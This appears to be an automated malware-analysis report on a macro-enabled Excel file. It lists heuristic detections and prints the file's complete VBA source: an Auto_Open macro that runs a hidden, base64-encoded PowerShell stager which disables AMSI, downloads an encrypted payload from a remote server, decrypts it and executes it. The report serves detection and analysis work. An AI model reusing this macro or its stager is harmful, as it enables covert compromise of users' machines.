Verdict: MALICIOUS
Risk score: 288
Heuristics: 7
-
VBA project inside OOXML — medium — 6 related findings — OOXML_VBA — Document contains a VBA project (VBA macros present)
-
Shell() call in VBA — critical — OLE_VBA_SHELL — Shell() call in VBA — Matched line in script:
R = R + "AEkAVgArACQASwApACkAfABJAEUAWAA=" Set asd = CreateObject("WScript.Shell") asd.Run (R) -
WScript.Shell usage — critical — OLE_VBA_WSCRIPT — WScript.Shell usage — Matched line in script:
R = R + "AEkAVgArACQASwApACkAfABJAEUAWAA=" Set asd = CreateObject("WScript.Shell") asd.Run (R) -
PowerShell reference in VBA — critical — OLE_VBA_PS — PowerShell reference in VBA — Matched line in script:
Dim R As String R = "powershell -noP -sta -w 1 -enc SQBGACgAJABQAFMAVg" R = R + "BFAHIAcwBpAG8AbgBUAGEAYgBMAGUALgBQAFMAVgBFAHIAUwBJ" -
CreateObject call — high — OLE_VBA_CREATEOBJ — CreateObject call — Matched line in script:
R = R + "AEkAVgArACQASwApACkAfABJAEUAWAA=" Set asd = CreateObject("WScript.Shell") asd.Run (R) -
VBA p-code auto-exec with execution tokens — high — OLE_VBA_PCODE_AUTOEXEC_EXEC — The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell, download, or object-execution tokens. This catches macro documents that are p-code-only, or whose source extraction failed, so that the finding does not depend on visible source being available.
-
Auto_Open macro — low — OLE_VBA_AUTO — Auto_Open macro — Matched line in script:
Attribute VB_Name = "Module1" Sub Auto_Open() QZ
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 6330 bytes |
SHA-256: 6f2346b3e30e011a4cacc83fd3a4668df623db9d1322371ed75ee7ca6abf8cf9
Preview script — first 1,000 lines of the extracted script:
Attribute VB_Name = "Module1"
Sub Auto_Open()
QZ
End Sub
Public Function QZ() As Variant
Dim R As String
R = "powershell -noP -sta -w 1 -enc SQBGACgAJABQAFMAVg"
R = R + "BFAHIAcwBpAG8AbgBUAGEAYgBMAGUALgBQAFMAVgBFAHIAUwBJ"
R = R + "AG8AbgAuAE0AQQBKAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAE"
R = R + "UAZgA9AFsAUgBFAGYAXQAuAEEAcwBTAGUAbQBCAEwAeQAuAEcA"
R = R + "ZQBUAFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQ"
R = R + "BnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBB"
R = R + "AG0AcwBpACcAKwAnAFUAdABpAGwAcwAnACkAOwAkAFIARQBGAC"
R = R + "4ARwBlAFQARgBpAEUAbABEACgAJwBhAG0AcwBpAEkAbgBpAHQA"
R = R + "RgAnACsAJwBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbA"
R = R + "BpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdABWAGEATABV"
R = R + "AGUAKAAkAG4AdQBsAGwALAAkAFQAcgB1AEUAKQA7AFsAUwB5AH"
R = R + "MAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBFAHYA"
R = R + "ZQBuAHQAaQBuAGcALgBFAHYAZQBuAHQAUAByAG8AdgBpAGQAZQ"
R = R + "ByAF0ALgAiAEcAZQB0AEYAaQBlAGAAbABkACIAKAAnAG0AXwBl"
R = R + "ACcAKwAnAG4AYQBiAGwAZQBkACcALAAnAE4AbwBuACcAKwAnAF"
R = R + "AAdQBiAGwAaQBjACwAJwArACcASQBuAHMAdABhAG4AYwBlACcA"
R = R + "KQAuAFMAZQB0AFYAYQBsAHUAZQAoAFsAUgBlAGYAXQAuAEEAcw"
R = R + "BzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBz"
R = R + "AHQAZQAnACsAJwBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAE"
R = R + "EAdQB0AG8AbQBhAHQAaQBvAG4ALgBUAHIAYQBjAGkAbgBnAC4A"
R = R + "UABTAEUAJwArACcAdAB3AEwAbwBnAFAAcgBvAHYAaQBkAGUAcg"
R = R + "AnACkALgAiAEcAZQB0AEYAaQBlAGAAbABkACIAKAAnAGUAdAAn"
R = R + "ACsAJwB3AFAAcgBvAHYAaQBkAGUAcgAnACwAJwBOAG8AbgBQAH"
R = R + "UAYgAnACsAJwBsAGkAYwAsAFMAJwArACcAdABhAHQAaQBjACcA"
R = R + "KQAuAEcAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAApACwAMA"
R = R + "ApADsAfQA7AFsAUwBZAFMAVABFAG0ALgBOAEUAdAAuAFMAZQBy"
R = R + "AFYAaQBjAGUAUABvAEkATgB0AE0AYQBOAGEAZwBlAHIAXQA6AD"
R = R + "oARQB4AHAAZQBDAHQAMQAwADAAQwBvAE4AVABJAG4AVQBFAD0A"
R = R + "MAA7ACQAZgA5ADQAZQA9AE4AZQBXAC0ATwBiAEoARQBjAFQAIA"
R = R + "BTAFkAUwB0AGUAbQAuAE4ARQBUAC4AVwBFAGIAQwBMAEkAZQBu"
R = R + "AFQAOwAkAHUAPQAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAgAC"
R = R + "gAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAIABXAE8A"
R = R + "VwA2ADQAOwAgAFQAcgBpAGQAZQBuAHQALwA3AC4AMAA7ACAAcg"
R = R + "B2ADoAMQAxAC4AMAApACAAbABpAGsAZQAgAEcAZQBjAGsAbwAn"
R = R + "ADsAJABzAGUAcgA9ACQAKABbAFQARQB4AHQALgBFAG4AYwBPAE"
R = R + "QAaQBOAGcAXQA6ADoAVQBuAGkAQwBvAEQARQAuAEcARQBUAFMA"
R = R + "VABSAEkATgBnACgAWwBDAE8ATgBWAGUAUgB0AF0AOgA6AEYAcg"
R = R + "BvAG0AQgBBAFMARQA2ADQAUwBUAFIAaQBuAGcAKAAnAGEAQQBC"
R = R + "ADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAE"
R = R + "QAawBBAE0AZwBBAHUAQQBEAEUAQQBOAGcAQQA0AEEAQwA0AEEA"
R = R + "TQBRAEEAdwBBAEQAQQBBAEwAZwBBAHgAQQBEAFEAQQBOAGcAQQ"
R = R + "A2AEEARABnAEEATQBBAEEANABBAEQAQQBBACcAKQApACkAOwAk"
R = R + "AHQAPQAnAC8AbABvAGcAaQBuAC8AcAByAG8AYwBlAHMAcwAuAH"
R = R + "AAaABwACcAOwAkAEYAOQA0AGUALgBIAEUAQQBEAGUAUgBzAC4A"
R = R + "QQBkAEQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQ"
R = R + "ApADsAJABGADkANABlAC4AUAByAE8AeAB5AD0AWwBTAFkAcwBU"
R = R + "AGUAbQAuAE4AZQB0AC4AVwBlAEIAUgBlAFEAdQBFAFMAdABdAD"
R = R + "oAOgBEAGUARgBhAHUATAB0AFcAZQBCAFAAcgBvAFgAWQA7ACQA"
R = R + "ZgA5ADQARQAuAFAAUgBPAHgAeQAuAEMAUgBlAEQARQBOAFQAaQ"
R = R + "BBAEwAcwAgAD0AIABbAFMAeQBzAFQAZQBtAC4ATgBFAHQALgBD"
R = R + "AFIARQBEAGUATgB0AGkAQQBsAEMAYQBDAGgARQBdADoAOgBEAG"
R = R + "UAZgBBAFUAbABUAE4ARQB0AFcATwByAGsAQwByAEUAZABFAE4A"
R = R + "VABJAGEATABTADsAJABTAGMAcgBpAHAAdAA6AFAAcgBvAHgAeQ"
R = R + "AgAD0AIAAkAGYAOQA0AGUALgBQAHIAbwB4AHkAOwAkAEsAPQBb"
R = R + "AFMAWQBzAHQARQBtAC4AVABlAHgAdAAuAEUATgBjAG8AZABpAE"
R = R + "4ARwBdADoAOgBBAFMAQwBJAEkALgBHAEUAdABCAFkAdABFAFMA"
R = R + "KAAnAHQAdgBEAFkAfQB5AF8AMQArAC0AWABzACUAPwBsACMALw"
R = R + "AsACYAQgBpAEUAOgApAEwAZgBTAFUAYQBRAEkAMwAnACkAOwAk"
R = R + "AFIAPQB7ACQARAAsACQASwA9ACQAQQByAGcAUwA7ACQAUwA9AD"
R = R + "AALgAuADIANQA1ADsAMAAuAC4AMgA1ADUAfAAlAHsAJABKAD0A"
R = R + "KAAkAEoAKwAkAFMAWwAkAF8AXQArACQASwBbACQAXwAlACQASw"
R = R + "AuAEMAbwBVAG4AVABdACkAJQAyADUANgA7ACQAUwBbACQAXwBd"
R = R + "ACwAJABTAFsAJABKAF0APQAkAFMAWwAkAEoAXQAsACQAUwBbAC"
R = R + "QAXwBdAH0AOwAkAEQAfAAlAHsAJABJAD0AKAAkAEkAKwAxACkA"
R = R + "JQAyADUANgA7ACQASAA9ACgAJABIACsAJABTAFsAJABJAF0AKQ"
R = R + "AlADIANQA2ADsAJABTAFsAJABJAF0ALAAkAFMAWwAkAEgAXQA9"
R = R + "ACQAUwBbACQASABdACwAJABTAFsAJABJAF0AOwAkAF8ALQBiAH"
R = R + "gAbwBSACQAUwBbACgAJABTAFsAJABJAF0AKwAkAFMAWwAkAEgA"
R = R + "XQApACUAMgA1ADYAXQB9AH0AOwAkAGYAOQA0AEUALgBIAEUAQQ"
R = R + "BkAEUAcgBzAC4AQQBkAGQAKAAiAEMAbwBvAGsAaQBlACIALAAi"
R = R + "AGgAdgB6AHMAdQBTAEYATgBhAFYARABSAD0AdgB3AHAAUQBmAH"
R = R + "YAYgBWAFUAagBEAGgAdQBNADUAVAB1AG0AWQBVAHcAcgBCAGkA"
R = R + "ZwBNAGsAPQAiACkAOwAkAGQAYQB0AEEAPQAkAEYAOQA0AEUALg"
R = R + "BEAE8AdwBOAEwAbwBBAGQARABBAHQAQQAoACQAUwBlAHIAKwAk"
R = R + "AHQAKQA7ACQASQB2AD0AJABkAEEAdABBAFsAMAAuAC4AMwBdAD"
R = R + "sAJABkAEEAVABBAD0AJABEAGEAVABBAFsANAAuAC4AJABEAEEA"
R = R + "VABhAC4AbABlAG4ARwBUAEgAXQA7AC0AagBvAEkAbgBbAEMASA"
R = R + "BhAHIAWwBdAF0AKAAmACAAJABSACAAJABEAGEAVABBACAAKAAk"
R = R + "AEkAVgArACQASwApACkAfABJAEUAWAA="
Set asd = CreateObject("WScript.Shell")
asd.Run (R)
End Function
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
| vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 22016 bytes |
SHA-256: bc0a0a334248f37f4ae2a671dc4e70a395a87ad720ef54069f818a9956a18c01